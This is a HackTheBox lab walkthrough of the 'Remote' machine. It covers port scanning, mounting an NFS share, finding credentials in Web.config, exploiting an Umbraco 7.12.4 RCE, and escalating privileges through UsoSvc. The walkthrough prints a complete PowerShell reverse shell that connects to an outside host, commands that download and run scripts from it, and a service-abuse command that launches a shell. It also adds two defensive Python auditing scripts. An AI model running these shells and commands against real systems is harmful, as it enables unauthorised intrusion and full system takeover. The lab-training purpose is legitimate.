HackTheBox. Level Easy: Remote walkthrough. NFS, RCE in CMS Umbraco and LPE via UsoSvc

5 December 2024 5 minutes Author: Lady Liberty

“How to Find Vulnerabilities in CMS Umbraco and Gain Access to the System” is a step-by-step guide for cybersecurity professionals and pentesting enthusiasts. The article describes how to investigate open ports, analyze network services (including NFS), find configuration files and credentials, and exploit vulnerabilities in CMS Umbraco.

Step-by-step penetration through vulnerabilities in CMS Umbraco

The article investigates an NFS resource, analyzes a remote code execution (RCE) exploit in the Umbraco CMS, and studies a privilege escalation (LPE) vector via UsoSvc using PowerUp.

The connection to the lab is via VPN. For security reasons, it is not recommended to use work computers or devices that store sensitive data, as the connection is to a private network where information security specialists work.

Recon

The machine is assigned an IP address of 10.10.10.180, which we add to the /etc/hosts file.

10.10.10.180 	remote.htb

First, a scan of open ports is performed. To speed up the process, masscan is used, since scanning all ports with nmap takes longer. All TCP and UDP ports are scanned through the tun0 interface at a rate of 500 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.180 --rate=500

There are many ports open on the host. Now let’s scan them with nmap to filter and select the ones we need.

nmap remote.htb -p49680,49667,49666,49665,80,139,49678,5985,135,49679,111,445,47001,2049,49664,21

Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.

nmap -A remote.htb -p49680,49667,49666,49665,80,139,49678,5985,135,49679,111,445,47001,2049,49664,21

Port 111 belongs to NFS, which allows remote file systems to be mounted over the network. Let’s look at the list of exported shares.

There is an exported share available; let’s mount it.

This directory contains the Web.config file and the Umbraco folder. Umbraco is an open source content management system platform.

So we need to review all the configs and also find out the Umbraco version. Here is what stands out in Web.config.

We find the SMTP credentials and the Umbraco version: 7.12.4. This version of the CMS is vulnerable, but exploiting it requires valid credentials, which we now have.
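As an added, defender-side example (not code from the writeup), the following Python audits a Web.config the way a reviewer of an exposed NFS share would: it reads the Umbraco version from the umbracoConfigurationStatus appSetting and reports plaintext credentials in the smtp/network element and in connection strings. The embedded Web.config is a constructed sample with placeholder values, not the lab’s file.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample Web.config (placeholder values, not data from the lab).
SAMPLE_WEB_CONFIG = """<configuration>
  <appSettings>
    <add key="umbracoConfigurationStatus" value="7.12.4" />
  </appSettings>
  <connectionStrings>
    <add name="umbracoDbDSN"
         connectionString="Server=db.example.test;Database=umbraco;User Id=umbraco;Password=PLACEHOLDER-DB-PASSWORD" />
  </connectionStrings>
  <system.net>
    <mailSettings>
      <smtp from="noreply@example.test">
        <network host="smtp.example.test" userName="smtp-user" password="PLACEHOLDER-SMTP-PASSWORD" />
      </smtp>
    </mailSettings>
  </system.net>
</configuration>
"""

# Matches "Password=..." or "Pwd=..." inside a connection string.
PASSWORD_IN_CONNSTR = re.compile(r"(?:password|pwd)\s*=\s*([^;]+)", re.IGNORECASE)


def audit_web_config(xml_text):
    """Return the Umbraco version and every plaintext credential found in a Web.config."""
    root = ET.fromstring(xml_text)
    findings = {"umbraco_version": None, "credentials": []}
    # Umbraco records its installed version in this appSetting.
    for add in root.iterfind("./appSettings/add"):
        if add.get("key") == "umbracoConfigurationStatus":
            findings["umbraco_version"] = add.get("value")
    # SMTP credentials stored in the clear under system.net/mailSettings.
    for net in root.iterfind("./system.net/mailSettings/smtp/network"):
        if net.get("password"):
            findings["credentials"].append(
                {"where": "smtp/network", "user": net.get("userName"), "secret": net.get("password")})
    # Connection strings carrying an embedded password.
    for cs in root.iterfind("./connectionStrings/add"):
        match = PASSWORD_IN_CONNSTR.search(cs.get("connectionString", ""))
        if match:
            findings["credentials"].append(
                {"where": "connectionStrings/" + cs.get("name", "?"), "user": None, "secret": match.group(1)})
    return findings
```

Any credential this returns is one that every client able to mount the share can read, so it should be rotated and moved out of the config.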

Entry Point

Next, all files and directories on the remote server are retrieved to identify and analyze files that may be useful for further investigation.

ls -lR ./

After narrowing down the files, they are reviewed. The grep command is used to quickly find key data, in particular to detect lines containing words such as user, login, pass, vers, etc. As a result of this analysis, information about the existence of two users was discovered.

Next we grep again for the strings admin and ssmith, and we find the users’ password hashes.

And we successfully crack the administrator password.

A ready-made exploit can be found in the exploit-db database, but its correct use requires minor modification according to the specific conditions of the target system.

USER

First, we set the credentials and host address the exploit needs in order to run.

The second stage modifies the exploit payload by specifying the executable file and its parameters. In this case, the ping command is used for testing.

Once the program runs, we will see ICMP packets in tcpdump.

We load the following reverse shell:

# connect to the listener
$client = New-Object System.Net.Sockets.TCPClient('10.10.15.60',4321)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
# read a command, run it, and send the output back followed by a prompt
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()

Let’s save it in shell.ps1, and run the http server on the local machine.

sudo python3 -m http.server

Let’s change the payload accordingly.

After running the exploit, we get a connection back:

ROOT

During analysis of user information, a privilege was discovered that could be used to further escalate access rights.

Since the host runs Windows Server 2019, the privilege escalation method based on impersonation tokens does not work here.

Let’s use PowerUp to find the LPE vector. Let’s load it from the local host and perform a full check.

iex (New-Object Net.WebClient).DownloadString('http://10.10.15.60/tools/PowerUp.ps1');Invoke-AllChecks

PowerUp reports that we have permissions on the Update Orchestrator Service (UsoSvc), the service responsible for downloading, installing and verifying Windows updates.

For further exploitation, a second reverse shell script is created (a copy of the first with a different port) and downloaded to the target machine.

wget http://10.10.15.60/shell2.ps1 -O C:\Windows\Temp\shell2.ps1

We start it using UsoSvc.

Invoke-ServiceAbuse -Name UsoSvc -Command "cmd.exe /c powershell C:\Windows\Temp\shell2.ps1"

And we get a backconnect.
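As an added, defender-side example (not code from the writeup or from PowerUp), the following Python parses the SDDL that `sc.exe sdshow <service>` prints and flags Access-Allowed ACEs that grant SERVICE_CHANGE_CONFIG, WRITE_DAC or WRITE_OWNER to principals outside the administrative set, which is the class of service misconfiguration that PowerUp reported on UsoSvc above. The two SDDL strings are constructed samples, not the real ACLs of the lab machine; the right and SID abbreviations follow the standard SDDL tables.

```python
import re

# One "(...)" group per ACE in an SDDL DACL.
ACE_RE = re.compile(r"\(([^)]*)\)")
# SDDL rights that let a principal reconfigure or take over a service:
# DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC, WO = WRITE_OWNER, GA/GW = generic all/write.
DANGEROUS_RIGHTS = {"DC", "WD", "WO", "GA", "GW"}
# Principals that are expected to hold such rights on a service.
PRIVILEGED_SIDS = {"SY", "BA", "LA"}
FRIENDLY_SIDS = {"AU": "Authenticated Users", "BU": "BUILTIN\\Users", "WD": "Everyone",
                 "IU": "Interactive", "SU": "Service", "AN": "Anonymous"}

# Constructed SDDL strings in the format `sc.exe sdshow <service>` prints;
# they are not the real ACLs from the lab machine.
HARDENED_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                 "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)")


def split_rights(rights):
    """Split an SDDL rights field such as 'CCDCLC' into two-letter tokens."""
    if rights.startswith("0x"):
        return [rights]  # hex access mask; not expanded in this example
    return [rights[i:i + 2] for i in range(0, len(rights), 2)]


def weak_service_aces(sddl):
    """Return (principal, [dangerous rights]) for Allow ACEs that grant write-type
    service rights to a principal outside PRIVILEGED_SIDS."""
    if "D:" not in sddl:
        return []
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # keep only the DACL part
    weak = []
    for ace in ACE_RE.findall(dacl):
        fields = ace.split(";")
        if len(fields) < 6 or fields[0] != "A":  # only Access-Allowed ACEs matter here
            continue
        rights, sid = fields[2], fields[5]
        if sid in PRIVILEGED_SIDS:
            continue
        bad = sorted(r for r in split_rights(rights) if r in DANGEROUS_RIGHTS)
        if bad:
            weak.append((FRIENDLY_SIDS.get(sid, sid), bad))
    return weak
```

Running this over the output of `sc.exe sdshow` for every installed service gives the same list of modifiable services a tool like PowerUp would report, which is what an administrator should review and fix before an attacker finds it.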

Conclusion

This article shows step by step how to find vulnerabilities in the Umbraco CMS and exploit them to gain access to the system. Basic tools are used to scan the network, search for configuration files, and obtain important information such as logins and passwords.

Based on the data found, a remote access exploit is launched, and then a method of elevation of privilege through the Windows Update service is used. Thanks to this, it was possible to take full control of the target machine.

The article will be useful for those who are learning the basics of pentesting or want to understand how to use tools and exploits in real-world situations.
